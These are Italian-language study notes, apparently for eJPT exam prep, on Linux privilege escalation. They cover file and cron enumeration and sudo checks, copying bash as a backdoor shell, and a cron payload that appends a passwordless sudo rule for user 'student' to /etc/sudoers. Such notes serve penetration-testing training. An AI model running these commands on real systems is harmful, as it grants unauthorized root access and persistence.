Tutorials

Comandi utili

> 🧠 Contesto: Tecniche e comandi utili per l'escalation dei privilegi in ambiente Linux, studiati durante il corso eLearnSecurity propedeutico alla certificazione eJPT. ---

#exploitation#post-exploitation#linux

🛡️ Linux Privilege Escalation - Appunti e Tecniche (eJPT Prep)

🧠 Contesto: Tecniche e comandi utili per l'escalation dei privilegi in ambiente Linux, studiati durante il corso eLearnSecurity propedeutico alla certificazione eJPT.

🧪 Comandi Utili per l'Analisi Iniziale

#### 🔍 Analisi dei file sospetti o binari custom:

bash
file nome_file
Mostra il tipo di file (utile per identificare script, binari ELF, etc.)
bash
strings nome_file
Estrae tutte le stringhe ASCII leggibili da un file binario o script. Utile per individuare password, percorsi o comandi.

📁 Manipolazione dei File

bash
cp /bin/bash nome_file
Copia della bash in un altro file. Può essere utile per persistence o per creare un backdoor shell.

👥 Informazioni sull’Utente

bash
groups student
Verifica a quali gruppi appartiene l'utente student. L'appartenenza a gruppi privilegiati (es. sudo, docker, adm) può facilitare l'escalation.

🕒 Cron Job Enumeration

bash
crontab -l
Mostra i cron job dell’utente corrente. Attenzione a script eseguiti con privilegi elevati.
bash
grep -rnw /usr -e "/path/to/file"
Ricerca ricorsiva nel filesystem per vedere dove viene referenziato un file (es. payload o script malevolo).

💣 Scrittura su File Sensibili

bash
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /path/to/file
Esempio di payload scritto in un file di cron con permessi root. Consente allo user student di ottenere privilegi sudo senza password.
⚠️ Usare con cautela. Manipolare /etc/sudoers direttamente può bloccare l'accesso root se malformato.

🧾 Verifica dei Privilegi Sudo

bash
sudo -l
Elenca i comandi eseguibili con sudo senza inserimento della password. Utile per attacchi tipo:
  • Abuso di sudo su comandi per lanciare shell (less, vim, find, python, ecc.)
  • Escalation tramite script modificabili eseguiti con sudo

🎯 Obiettivo dell’Escalation

  • Accedere a /etc/shadow
  • Creare utenti con privilegi di root
  • Ottenere shell persistente privilegiata
  • Evadere da ambienti controllati o containerizzati

📎 Note Finali

  • Integra queste tecniche con tool come linpeas, linenum.sh, GTFOBins e sudo_killer per automatizzare la discovery.
  • Tieni traccia dei permessi, delle configurazioni errate e dei file world-writable.
  • Attenzione al contesto: molte tecniche dipendono dalla distribuzione Linux e dalla configurazione specifica.

Fammi sapere se vuoi integrare anche metodi di escalation tramite capabilities, setuid, NFS share, o Docker abuse. Posso arricchire ulteriormente la guida!